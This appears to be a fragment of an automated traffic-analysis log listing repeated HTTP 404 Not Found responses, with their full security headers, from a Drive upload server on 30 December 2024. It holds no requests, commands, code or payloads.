                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC66UNAuF2sLFPL6ZPCjeu-DaThpG9MYoTIEo6QR7Rv9zytTE0nrFEuOOTzRBmM0rgBTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:27 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-OyiAS95osj46qw53dO3gjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5BhhA0SSzwWRZvg9MY87UilkkX0UJVrCei4eomyzmqAS8BR_Za7v_Fc7jQxdt2zcbwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:29 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-kEyG06nT5QhQtUQoG5IxsA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC70cgLhJAaNlr3VkCBpcwWJL6Xrru_V0gTPMbKkLocjn04u7vDl5bWn6HZ49BLvJlNuContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:29 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-TaCuWS-ADzlFmTgl6mYd4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6zoQ8Qn92jvK3FfhHJTZQ-1j7G3CUHwa0y6jWNf6cujUVq7vFf1aN7BHGoSl2NqqpbPn8iKhUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:30 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-Iwq34f5rA90gdHFXscs6TQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5sDdhMUQEQGHK_cbMuBMuuU8hYOUjrphEUfZ9VKKpICI1mzBnJmRnt0YoIpjLmP-afContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:30 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-xE-SHB4rpjxVVOON_wOq1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC47Ofst_04703X-jxikXPOSz9cqTLuPJfNLD_LLIQ4IbK8bRFNmKKRGk5Ycu4ARRqqAqv16b3YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:31 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-KFVJTeTpsoyysTihnFfzgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7SAzOYupDZ05LV_z76phjrmO-0SpXE_tq0tYORE8nq1XkOhXXgsCapNl_iKpI2TWu_Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:31 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Ey3GK5Q5LDi1q5nofydvrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4PuUDyphoy8KmFwsU5er-kd864ulNq9HuhlRb0W5gsMo2WNvJfbFFegnSiSxAibboWDmntVGIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:33 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_-05O3210MhRWWrtd2oXBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC59DRuS45ujYof2DuGcZenjfGHT8jBZ4GRVXXux24nnJ7IIapP_vXAcQF9u0PpJ0c0MContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:33 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-MuhGKX1y2bQ4XQAieqm40g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4mjToT3vrSxg6rqNA6Pl2qwohedo24r3ijhAoDYLdaMf7n0mSe-r4K9gUTlKKt6LBxj6I_DmYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:34 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ZZH0P7jWHDmOgODjfYBfnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC54xQ0Tf63hlaODUuaeCKYJe_HlvMBLgTXSkzZzRqSfe0keg0JQaJddIJrt4CKi2wIfcb8lEbAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:34 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-lJTrYG_K_0JJ9b2ZXcOvAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC50gKEhsw1EpbvCvJudQQXB9Zj8N5dVmyIzgvHB6GSBthw6ytB6PlB4qWWpi5crm1DWP0YQxIQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:35 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-eYNsoUoDuDTQmyDEB_qVSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7gZE0gJqjxLgknTnz7MeuL9ilOLLUGrJdacPSrXqt8hvaBzMhxEF7hoJFM3BEBuEZ6QMvrth8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:35 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-DzWcVu6thaiyBk_ZwJaSUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC66ETeZFtdzErNA9mFh4pBLfbGgTWF7E3tkb6R0Hr19Yq-Vbza_I0dV39PLaORoVimnContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:37 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Id35bcFQO1T3FD6fW7iJhA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6gQ2wTUW57RboPtcILDKCFE5Xa8RE1JBPTiLHKNk57r9z3Axdb1s2a1OK6Krs4lO9UuwOSBkAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:37 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-OiPY3fw4m7Mde_e3JBawvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6o16xQP6GlwhgZ-6SAQ6rKHc6WA-IYJIuB49jFTlY1vw9Qy_W-rJdOftz74dW13XCCWW6vhlIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:38 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-Y8YyhHqMRbjXltOgJHdlQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5zXxuK_bQp_Xy30aZo0MMEMkvhbtPiIGeovB62fgMYOYtKZml67IyxE-JVjH4f63C0MD-bMF0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:38 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-MV-my6-bpaSWN99ylu_5YA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4XcyLauGjruOHgjv96iD8YvfY6Npm99sd_ouHDY3LNRohzDjN86WLB5k7hSS_CEEOBContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:39 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ehuQOsk3rJONPZhLiOLOTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5IyOX8jbAHvrFCnm4UT5K4vvmTeCrpx_ML6zFQz5UlKAf5EX0_kRVDNbRtWujozLoBContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:39 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-JZmAO8vsQbVnS0BKJcyc-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC75xbiWMjEFo4LnNuqjCdwgNGhlstEdyunEUnfksHzV7HD0LUL7MIZFZprkhY3iNvL7Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:40 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-C1PQ37m89qgupSli_I4tdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
